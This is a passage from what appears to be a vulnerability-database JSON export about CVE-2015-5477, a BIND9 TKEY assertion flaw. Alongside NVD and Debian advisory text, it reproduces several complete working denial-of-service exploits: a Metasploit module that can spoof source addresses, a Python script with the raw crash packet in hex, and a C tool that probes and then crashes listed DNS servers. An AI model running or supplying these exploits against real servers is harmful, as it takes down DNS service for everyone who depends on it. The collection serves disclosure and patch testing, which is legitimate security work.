'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\n ['URL', 'https://kb.isc.org/article/AA-01272']\n ],\n 'DisclosureDate' => '2015-07-28',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n\n name_length = [name.length].pack('C')\n txt_length = [txt.length].pack('C')\n data_length = [txt.length + 1].pack('n')\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\n\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n query << ttl # Time to live\n query << data_length # Data length\n query << txt_length # TXT Length\n query << txt # TXT\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tkey.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-09-25T01:05:44", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.\n", "edition": 2, "cvss3": {}, "published": "2015-08-01T11:01:35", "type": "metasploit", "title": "BIND TKEY Query Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-16T18:18:28", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TKEY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TKEY Query Denial of Service',\n 'Description' => %q{\n This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.\n },\n 'Author' => [\n 'Jonathan Foote', # Original discoverer\n 'throwawayokejxqbbif', # PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2015-5477'],\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\n ['URL', 'https://kb.isc.org/article/AA-01272']\n ],\n 'DisclosureDate' => '2015-07-28',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n\n name_length = [name.length].pack('C')\n txt_length = [txt.length].pack('C')\n data_length = [txt.length + 1].pack('n')\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\n\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n query << ttl # Time to live\n query << data_length # Data length\n query << txt_length # TXT Length\n query << txt # TXT\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tkey.rb", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - TKEY Remote Denial of Service (PoC)", "edition": 2, "cvss3": {}, "published": "2015-08-05T00:00:00", "title": "ISC BIND 9 - TKEY Remote Denial of Service (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": "EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F", "href": "", "sourceData": "#!/usr/bin/env python\n\n# Exploit Title: PoC for BIND9 TKEY DoS\n# Exploit Author: elceef\n# Software Link: https://github.com/elceef/tkeypoc/\n# Version: ISC BIND 9\n# Tested on: multiple\n# CVE : CVE-2015-5477\n\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\n\tsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - TKEY (PoC)", "edition": 2, "cvss3": {}, "published": "2015-08-01T00:00:00", "title": "ISC BIND 9 - TKEY (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T00:00:00", "id": "EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F", "href": "", "sourceData": "/*\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\n\n Usage:\n tkill <hostname>\n\n What it does:\n - First sends a \"version\" query to see if the server is up.\n - Regardless of the version response, it then sends the DoS packet.\n - Then it waits 5 seconds for a response. If the server crashes,\n there will be no response.\n\n Notes:\n - multiple hostnames can be specified on the command-line\n - IP addresses can be specified instead of hostnames\n - supports IPv4 and IPv6\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\n - if a hostname resolves to more than one IP, then all IPs\n will be probed\n\n About the vuln:\n For control information, the \"TSIG\" feature allows packets to be\n signed with a password. This allows slave servers to get updates\n from master servers without a MitM attack (like from the NSA)\n changing the data on the network.\n\n A password can be distributed out of band, such as SSHing into\n a box and editing the configuration file. Anther way is through\n public-keys. That's the \"TKEY\" feature: it distributes new\n TSIG passwords using public-keys.\n\n When processing a TKEY packet, the code will call a function to\n fetch the proper TKEY record. It looks in two places: the\n \"answer records\" section, and the \"additional records\" section.\n If it can't find it in the \"additional\", it looks in \"answer\".\n\n The lookup function takes a parameter that is initially set\n to NULL. During the failed lookup in the \"additional\" section,\n it may set that parameter to a non-null value. Since a non-null\n value is passed in again during the second lookup in the \"answer\"\n section, the code crashes.\n\n The patch was to set the variable to NULL before the second lookup.\n\n The correct fix would simply not check to see if the parameter\n was NULL to be begin with. It's an out-only parameter, so it's value\n on input doesn't matter.\n\n This is a just a \"brainfart\" bug that can only result in a crash\n of the server. It cann't result in data-corruption or code\n execution.\n\n About this code:\n To learn about writing network code, this is probably something useful\n to study.\n\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\n the differences are between the two platforms, as well as the simularities.\n\n It works on both IPv4 and IPv6. However, if you search through the code,\n you'll find nothing that specifically references either version. It's\n magically dual-stack. That's because it uses new functions like\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\n \n*/\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\n#ifdef WIN32\n#include <winsock2.h>\n#include <ws2tcpip.h>\n#pragma comment(lib, \"Ws2_32.lib\")\n#define WSA(err) (WSA##err)\n#define WSAEAGAIN WSAETIMEDOUT\n#else\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netdb.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#define WSAGetLastError() (errno)\n#define WSA(err) (err)\n#define closesocket(fd) close(fd)\n#endif\n\n/*\n * DoS packet that will crash server\n */\nstatic const unsigned char dospacket[] = {\n 0x01, 0x02, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\n\n /* Query name */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\n 0x00, 249, /* TKEY record type */\n 0x00, 255,\n\n /* Additional record */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\n 0x00, 16, /* record type: must NOT be 249/TKEY */\n 0x00, 255,\n 0, 0, 0, 0,\n 0, 51,\n 50,\n 'h', 't', 't', 'p', 's', ':', '/', '/', \n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \n '-', '2', '0', '1', '5', '-', '5', '4', \n '7', '7'\n};\n\n\n/*\n * Packet for querying the version of the server, to test if it's up\n */\nstatic const unsigned char versionpacket[] = {\n 0x03, 0x04, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x00, /* no additional */\n\n /* Query name */\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\n 0x00, 16, /* TXT */\n 0x00, 3, /* CHOAS */\n};\n\n\n/*\n * YOLO BIND version.bind query\n */\nint query_version(int fd, const struct addrinfo *target)\n{\n int bytes_received;\n int i;\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n char hostname[256];\n unsigned char buf[2048];\n int result = 0;\n\n /* \n * Query version \n */\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \n target->ai_addr, target->ai_addrlen);\n\n\n /* \n * get response \n */\nagain:\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\n return 0;\n } else if (bytes_received <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n return 0;\n }\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n\n /* \n * parse response \n */\n if (bytes_received < 12)\n goto again;\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\n goto again;\n if ((buf[2]&0x80) != 0x80)\n goto again;\n\n /*\n * Handle respoonse code \n */\n switch (buf[3]&0x0F) {\n case 0:\n /* parse packet below */\n break;\n case 1:\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\n return 1;\n case 2:\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\n return 1;\n case 3:\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\n return 1;\n case 4:\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\n return 1;\n case 5:\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\n return 1;\n default:\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\n return 1;\n }\n\n\n i = 12; /* skip header */\n\n /* \n * skip query name \n */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n i += 4;\n\n /* \n * process all answers \n */\n while (i + 12 <= bytes_received) {\n int t, c, len;\n\n /* skip answer name */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n\n /* extract resource-recorder header */\n if (i + 10 > bytes_received)\n break;\n t = buf[i+0]<<8 | buf[i+1];\n c = buf[i+2]<<8 | buf[i+3];\n len = buf[i+8]<<8 | buf[i+9];\n i += 10;\n\n /* verify TXT CHAOS */\n if (t != 16 || c != 3) {\n i += len;\n continue;\n }\n\n /* fix len */\n if (len > bytes_received - i)\n len = bytes_received - i;\n\n /* print the hostname */\n fprintf(stderr, \"[+] %s: \", hostname);\n\n /* print the strings */\n {\n int j = i;\n\n i += len;\n\n while (j < i) {\n int len2 = buf[j];\n int k;\n j++;\n if (len2 > bytes_received - len2)\n len2 = bytes_received - len2;\n fprintf(stderr, \"\\\"\");\n\n for (k=j; k<j+len2; k++) {\n if (buf[k] == '\\\\')\n fprintf(stderr, \"\\\\\");\n else if (!isprint(buf[k]))\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\n else\n fprintf(stderr, \"%c\", buf[k]);\n }\n\n j = k;\n\n fprintf(stderr, \"\\\" \");\n }\n fprintf(stderr, \"\\n\");\n }\n result = 1;\n }\n return result;\n}\n\n/*\n * Send the DoS packet\n */\nvoid probe(const struct addrinfo *target)\n{\n int fd;\n int x;\n int i;\n char hostname[256];\n char buf[2048];\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n \n \n /*\n * Print status\n */\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\n\n /*\n * Create a socket\n */\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\n if (fd <= 0) {\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\n return;\n }\n\n /*\n * Set the timeout to 5-seconds\n */\n {\n#ifdef WIN32\n int milliseconds = 5000;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\n#else\n struct timeval t;\n t.tv_sec = 5;\n t.tv_usec = 0;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\n#endif\n\n if (x != 0) {\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\n }\n }\n\n\n /*\n * First, query the server to grab its version, but also to see it's up\n */\n fprintf(stderr, \"[+] Querying version...\\n\");\n for (i=0; i<3; i++) {\n if (query_version(fd, target))\n break;\n if (i == 2) {\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\n }\n }\n\n\n /*****************\n * SEND DoS PACKET\n *****************/\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\n\n /* Grab response */\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\n for (;;) {\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\n break;\n } else if (x <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n break;;\n }\n\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\n continue;\n \n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\n break;\n }\n\n\n closesocket(fd);\n}\n\n\n/*\n * The main function just parses the arguments and looks up IP addrsses\n * before calling the \"probe\" function to actually exploit the targets\n */\nint main(int argc, char *argv[])\n{\n int i;\n\n#ifdef WIN32\n {WSADATA x; WSAStartup(0x101, &x);}\n#endif\n\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\n\n if (argc <= 1) {\n fprintf(stderr, \"[-] no host specified\\n\");\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\n return -1;\n }\n\n\n /*\n * Query all targets specified on the command line\n */\n for (i=1; i<argc; i++) {\n const char *hostname = argv[i];\n struct addrinfo *info;\n struct addrinfo *target;\n char oldtarget[256] = \"\";\n int x;\n\n /*\n * Lookup the name of the target\n */\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\n x = getaddrinfo(hostname, \"53\", 0, &info);\n if (x != 0) {\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\n continue;\n }\n\n if (info->ai_next) {\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\n }\n\n /*\n * Since a name can return multiple IP addresses,\n * send a probe to all the results\n */\n for (target=info; target; target = target->ai_next) {\n char newtarget[256];\n\n /* bah, stupid bug in Linux gets the same target multiple\n * times */\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\n if (strcmp(newtarget, oldtarget) == 0)\n continue;\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\n\n probe(target);\n printf(\"\\n\");\n }\n\n /*\n * Cleanup\n */\n freeaddrinfo(info);\n }\n\n return 0;\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:59:58", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-29T14:59:00", "type": "cve", "title": "CVE-2015-5477", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-11-10T02:29:00", "cpe": ["cpe:/a:isc:bind:9.10.2", "cpe:/a:isc:bind:9.9.7"], "id": "CVE-2015-5477", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.9.7:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p2:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-12-01T16:59:55", "description": "Package : bind9\nVersion : 1:9.7.3.dfsg-1~squeeze16\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T19:23:41", "type": "debian", "title": "[SECURITY] [DLA 285-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:23:41", "id": "DEBIAN:DLA-285-1:3629A", "href": "https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-01-30T00:48:58", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3319-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 28, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-07-28T19:05:08", "type": "debian", "title": "[SECURITY] [DSA 3319-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:05:08", "id": "DEBIAN:DSA-3319-1:36EAC", "href": "https://lists.debian.org/debian-security-announce/2015/msg00215.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T22:51:37", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3319-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 28, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-07-28T19:05:08", "type": "debian", "title": "[SECURITY] [DSA 3319-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:05:08", "id": "DEBIAN:DSA-3319-1:132B5", "href": "https://lists.debian.org/debian-security-announce/2015/msg00215.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-23T22:24:40", "description": "Package : bind9\nVersion : 1:9.7.3.dfsg-1~squeeze16\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T19:23:41", "type": "debian", "title": "[SECURITY] [DLA 285-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:23:41", "id": "DEBIAN:DLA-285-1:53550", "href": "https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-03-14T06:36:43", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-05T00:00:00", "type": "zdt", "title": "ISC BIND9 TKEY Remote DoS PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": "1337DAY-ID-23970", "href": "https://0day.today/exploit/description/23970", "sourceData": "# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 